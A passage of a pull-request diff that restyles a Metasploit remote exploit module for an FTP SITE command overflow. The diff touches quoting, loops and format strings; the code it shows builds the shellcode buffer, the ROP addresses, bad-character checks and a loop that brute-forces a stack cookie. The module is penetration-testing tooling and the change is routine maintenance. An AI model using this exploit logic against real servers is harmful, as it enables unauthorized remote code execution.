-        fail_with(Failure::NoTarget, "No matching target")
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       print_status("Selected Target: #{mytarget.name}")
@@ -347,14 +355,14 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    #puts "attach and press any key"; bleh = $stdin.gets
+    # puts "attach and press any key"; bleh = $stdin.gets
 
     buf = ''
     buf << 'SITE '
 
-    #buf << "\xcc"
+    # buf << "\xcc"
     if mytarget['CookieOffset']
-      buf << "\x8d\xa0\xfc\xdf\xff\xff"  # lea esp, [eax-0x2004]
+      buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004]
     end
     buf << payload.encoded
 
@@ -370,24 +378,23 @@ class MetasploitModule < Msf::Exploit::Remote
     ].pack('V*')
 
     if mytarget['RopStack']
-      addrs << mytarget['RopStack'].map { |e|
+      addrs << mytarget['RopStack'].map do |e|
         if e == 0xcccccccc
           rand_text(4).unpack('V').first
         else
           e
         end
-      }.pack('V*')
+      end.pack('V*')
     end
 
     # Make sure we didn't introduce instability
     addr_badchars = "\x09\x0a\x0b\x0c\x20"
-    if idx = Rex::Text.badchar_index(addrs, addr_badchars)
-      fail_with(Failure::Unknown, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]))
+    if (idx = Rex::Text.badchar_index(addrs, addr_badchars))
+      fail_with(Failure::Unknown, format('One or more address contains a bad character! (0x%<char>02x @ 0x%<index>x)', char: addrs[idx, 1].unpack('C').first, index: idx))
     end
 
     buf << addrs
     buf << "\r\n"
-
 
     #
     # In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it
@@ -397,7 +404,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # NOTE: if the cookie contains one of our bad characters, we're SOL.
     #
     if mytarget['CookieOffset']
-      print_status("!!! Attempting to bruteforce the cookie value! This can takes days. !!!")
+      print_status('!!! Attempting to bruteforce the cookie value! This can takes days. !!!')
 
       disconnect
 
@@ -405,17 +412,17 @@ class MetasploitModule < Msf::Exploit::Remote
       off = mytarget['Offset'] + mytarget['CookieOffset']
 
       cookie = last_cookie = 0
-      #cookie = 0x17ccd600
+      # cookie = 0x17ccd600
 
       start = Time.now
       last = start - 10
 
-      while not session_created?
+      until session_created?
         now = Time.now
         if (now - last) >= 10
           perc = (cookie * 100) / max
           qps = ((cookie - last_cookie) >> 8) / 10.0
-          print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie])
+          print_status(format('%<perc>.2f%% complete, %<qps>.2f attempts/sec - Trying: 0x%<cookie>x', perc: perc, qps: qps, cookie: cookie))
           last = now
           last_cookie = cookie
         end
@@ -430,8 +437,8 @@ class MetasploitModule < Msf::Exploit::Remote
         break if cookie > max
       end
 
-      if not session_created?
-        fail_with(Failure::Unknown, "Unable to guess the cookie value, sorry :-/")
+      if !session_created?
+        fail_with(Failure::Unknown, 'Unable to guess the cookie value, sorry :-/')
       end
     else
       sock.put(buf)


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

I used `CRASH_SERVICE_DOWN` due to memory corruption. This might not be accurate if only the thread crashes.
